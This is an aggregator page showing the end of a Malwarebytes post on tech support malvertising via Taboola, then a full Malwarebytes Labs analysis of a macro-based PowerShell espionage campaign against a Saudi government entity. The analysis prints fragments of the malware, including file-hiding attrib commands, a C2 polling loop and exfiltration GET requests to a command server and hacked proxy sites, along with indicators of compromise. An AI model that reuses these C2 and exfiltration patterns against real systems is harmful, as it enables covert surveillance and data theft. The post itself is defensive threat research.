Banner ads can load third-party tags that are laced with malicious content, not to mention promoting anything that is outrageous (regardless of whether it has anything to do with the current content) and is bound to get clicks. For instance, there have been many documented instances of fake celebrity deaths used for click bait purposes on Facebook.

But promoted stories aren’t necessarily that different (or safer) when they take the user to a third-party website that is in the complete control of an advertiser, good or bad.

Users should be aware that even on a trusted platform, they should watch what they click on and be careful of sensationalist stories that may be used as click bait.

We reported the fraudulent advertiser to Taboola which told us they had opened an internal review of this particular vendor. We reached back with more questions regarding how Taboola deals with click bait and fake news, whether they scan articles for malware or scams, and finally if they had a direct point of contact to report security-related issues. However, we only received a response for the fake news problem, which you can read more about here.

The post Tech support scammers abuse native ad and content provider Taboola to serve malvertising appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity

Malwarebytes - Wed, 09/27/2017 - 01:06

This post was co-authored by David Sánchez and Jérôme Segura

We recently came across a campaign targeting a Saudi Arabia Government entity via a malicious Word document which at first reminded us of an attack we had previously described on this blog.

In our previous research, we detailed how an information stealer Trojan was deployed via a Word macro, in order to spy on its victims (various parts of the Saudi Government). The stolen information was transmitted back to the threat actors’ infrastructure in an encrypted format.

This new threat also uses a macro to infect the target’s computer, but rather than retrieving a binary payload, it relies on various scripts to maintain its presence and to communicate via hacked websites, acting as proxies for the command and control server.

The malicious script fingerprints the victim’s machine and can receive any command that will run via PowerShell. In this blog post, we will describe the way this threat enters the system and maintains its presence while constantly communicating with its command and control server.

Covert delivery and persistence

The decoy document bears the logo of one of the branches of the Saudi Government and prompts the user to “Enable Content” stating that the document is in protected view (which is actually true).

A high-level summary static analysis of this document reveals that it includes a macro as well as several Base64 encoded strings.

OLE:MAS--B-- target.doc (Flags: M=Macros, A=Auto-executable, S=Suspicious keywords, B=Base64 strings)

One of the first routines the malicious VBScript performs is to disable or lower security settings within Microsoft Excel and Word by altering corresponding registry keys with values of “1”, meaning: Enable All (ref).

The VBScript also fingerprints the victim for their IP address by querying the Win32_NetworkAdapterConfiguration class:

It then proceeds to retrieve a stream of data from the Pastebin website using its own proxy:

The data is converted into two scripts, a PowerShell and a Visual Basic one, the latter being used for persistence on the infected machine via two different hook points: a Run key in the registry and a scheduled task.

This VBScript is really a launcher for the more important PowerShell script, and both are stored as hidden system files under the Documents folder using the following commands:

attrib +s +h "C:\Users\public\documents\NTSTATS.ps1" attrib +s +h "C:\Users\public\documents\NTSTATS.vbs" Espionage and exfiltration

That PowerShell script also has the same instructions to lower Office’s security settings but more importantly is used to exfiltrate data and communicate with the command and control server.

A unique ID is stored on the victim’s machine (in the same folder as the scripts) in a file called [username].key and is used to receive instructions via a server located in Germany (although it appears to be down at the time of writing).

GET http://144.76.109[.]88/al/?action=getCommand&id=[user ID] HTTP/1.1

A function called getKey retrieves the unique ID from the .key file stored on the local hard drive to register the machine as a new victim. If the key file does not exist, it queries for additional system information (computer name, IP address, OS version) and then creates that key (Set-Content $keypath $id).

Another function called getCommand uses the key as a parameter to then contact the C2. This command runs every 5 minutes:

while ($true){  getCommand $key  start-sleep -Seconds 300 }

The malicious script can receive and run any command the attackers want via PowerShell, making this a very powerful attack.

The eventual exfiltration of data is done via several hardcoded websites acting as a proxy via the sendResult function:

The transmission of data is done via Base64 encoded strings, one for the user id (.key file) and one for the exfiltrated data.

GET /wp-content/wp_fast_cache/wmg-global.com/Senditem.php?c=[removed]== HTTP/1.1 Host: www.wmg-global.com Connection: Keep-Alive

The parameters passed on the URL in the Base64 format:

action=saveResult&id=[removed]&cmd=2&chunk=last&res=[removed]=

Decoding the value in the variable “res”, we get the following info.

Connection-specific DNS Suffix . : [removed] Description . . . . . . . . . . . : [removed] Physical Address. . . . . . . . . : [removed] DHCP Enabled. . . . . . . . . . . : [removed] Autoconfiguration Enabled . . . . : [removed] Script based attack and protection

This attack is very different from the typical malicious spam we see on a daily basis, blasting Locky or some banking Trojan. Indeed, there is no malicious binary payload (although one could be downloaded by the C2) which makes us think the attackers are trying to keep a low profile and remain on the system while collecting information from their target.

Relying on scripts as part of the attack chain and ongoing infection is an interesting concept due to how modular it is, not to mention more likely to stay undetected from antivirus engines. At the same time, it needs to rely on various encoding techniques because it can’t make use of a packer like a traditional malware binary would. 

Malwarebytes users are already protected against this attack thanks to our signature-less engine.

Indicators of compromise

Scripts:

C:\Users\public\documents\NTSTATS.ps1 C:\Users\public\documents\NTSTATS.vbs

C2:

144.76.109[.]88/al/

Proxies:

larsson-elevator[.]com/plugins/xmap/com_k2/com.php?c= spearhead-training[.]com/action/point2.php?c= itcdubai[.]net/action/contact_gtc.php?c= taxconsultantsdubai[.]ae/wp-content/themes/config.php?c= projac.co[.]uk/Senditem.php?c= wmg-global[.]com/wp-content/wp_fast_cache/wmg-global.com/Senditem.php?c= romix-group[.]com/modules/mod_wrapper/Senditem.php?c= heartmade[.]ae/plugins/content/contact/Senditem.php?c= arch-tech[.]net/components/com_layer_slider/Senditem.php?c=

The post Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Pages

Subscribe to Furiously Eclectic People aggregator - Techie Feeds